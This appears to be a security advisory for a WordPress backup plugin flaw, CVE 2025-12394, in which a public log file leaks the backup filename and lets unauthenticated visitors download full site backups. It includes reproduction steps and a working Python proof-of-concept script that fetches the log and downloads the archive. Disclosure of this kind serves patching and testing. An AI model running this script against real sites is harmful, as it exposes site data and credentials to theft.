Backup Migration < 2.0.0 – Unauthenticated Backup Download | CVE 2025-12394

Description

The plugin does not properly generate its backup path in certain server configurations, allowing unauthenticated users to fetch a log that discloses the backup filename. The backup archive is then downloadable without authentication.

Proof of Concept

This is exploitable only under certain server configurations. You can use LocalWP to spin up an example site where this is exploitable:

https://localwp.com/

Then:

1. Log in as a WordPress administrator.
2. Navigate to the plugin panel at:
https://localhost/wp-admin/admin.php?page=backup-migration
3. Click on the "Create Backup Now" button.
4. After the backup is completed, the plugin generates a new backup file inside:
`wp-content/backup-migration/backups/`
5. A publicly accessible log file named `latest.log` is also created in the same directory. This file contains a line such as:
```
New backup created and its name is: BM_2025-10-08_07_25_58_iN7WpTtAwhjSrcUQ.zip
```
6. As an unauthenticated user, you can get the log from `https://example.com/wp-content/backup-migration/backups/latest.log`. You can then use the log filename to download the backup.

Alternatively, a Python script can automate the process:

```
#!/usr/bin/env python3
#   python poc_min.py http://localhost/

import sys, os, re, ssl
from urllib.parse import urljoin
from urllib.request import urlopen

if not (2 <= len(sys.argv) <= 3):
    print("Usage: python poc_min.py <base_wp_url> [--insecure]")
    sys.exit(1)

base = sys.argv[1].rstrip('/') + '/'
insecure = (len(sys.argv) == 3 and sys.argv[2] == "--insecure")

# Build URLs
log_rel = "wp-content/backup-migration/backups/latest.log"
log_url = urljoin(base, log_rel)

# Optional: allow self-signed cert for https (local testing only)
ctx = None
if base.lower().startswith("https"):
    ctx = ssl._create_unverified_context() if insecure else ssl.create_default_context()

print(f"[*] GET {log_url}")
with urlopen(log_url, timeout=15, context=ctx) as r:
    text = r.read().decode("utf-8", errors="ignore")

m = re.search(r"New backup created and its name is\s*:\s*([^\s]+\.zip)", text, flags=re.IGNORECASE)
if not m:
    print("[!] Backup name line not found in latest.log")
    sys.exit(2)

name = os.path.basename(m.group(1))
backups_base = log_url.rsplit('/', 1)[0] + '/'
zip_url = urljoin(backups_base, name)

print(f"[*] Found: {name}")
print(f"[*] Downloading: {zip_url}")

with urlopen(zip_url, timeout=60, context=ctx) as r, open(name, "wb") as f:
    while True:
        chunk = r.read(8192)
        if not chunk:
            break
        f.write(chunk)

print(f"[+] Saved: {name}")
```